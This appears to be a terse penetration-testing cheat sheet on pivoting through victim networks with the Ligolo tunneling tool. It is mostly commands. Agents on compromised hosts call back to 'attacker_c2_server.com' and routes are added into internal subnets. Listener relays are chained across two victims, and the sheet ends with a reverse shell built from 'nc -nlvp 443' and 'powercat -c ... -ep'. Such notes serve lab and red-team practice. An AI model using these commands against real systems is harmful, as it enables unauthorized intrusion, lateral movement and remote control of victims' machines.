Ligolo

Server (proxy)

setup

sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

ip addr show ligolo

start server

./proxy -laddr 0.0.0.0:3389 -selfcert

choose a common port (3389, 25, 123) - default 11601

./agent -connect attacker_c2_server.com:53 -ignore-cert

@ligolo chk network config

session 
1

>> agent xx
ifconfig

in same 192.168.w.0/24 subnet, victim has access to 192.168.x.0/24

add corr. network

sudo ip route add 172.16.x.0/24 dev ligolo 
ip route list

@ligolo session

>> agent xx
start

nmap 192.168.x.0/24

in 2nd agent

./agent -connect attacker_c2_server.com:53 -ignore-cert

@ligolo chk network config

session 
2

>> agent yy
ifconfig

the machine in 192.168.x.0/24 has access to 192.168.y.0/24 subnet

add corr. network

sudo ip route add 192.168.y.0/24 dev ligolo 
ip route list

@ligolo session 1

stop

session
2

>> agent yy
start_tunnel

able to switch tunnel simply by start in the 2nd session and choose to close the 1st tunnel via prompt

victim 2 (agent 2) 25 traffics directing to attacker (server) 443 listener

@ligolo session 2

>> agent yy
listener_add --addr 0.0.0.0:25 --to 127.0.0.1:443 --tcp

listener_list
listener_stop

192.168.y.0 subnet machine callback to 192.168.x.0:25 forward to kali at 192.168.w.0:443

listener_add --addr 0.0.0.0:8081 --to 172.16.202.194:8081 --tcp

in 192.168.w.0 kali -

nc -nlvp 443

in 192.168.y.0 machine -

powercat -c 192.168.x.0 -p 25 -ep

sudo ip route add 240.0.0.1/32 dev ligolo

nmap 240.0.0.1

Last updated 9 months ago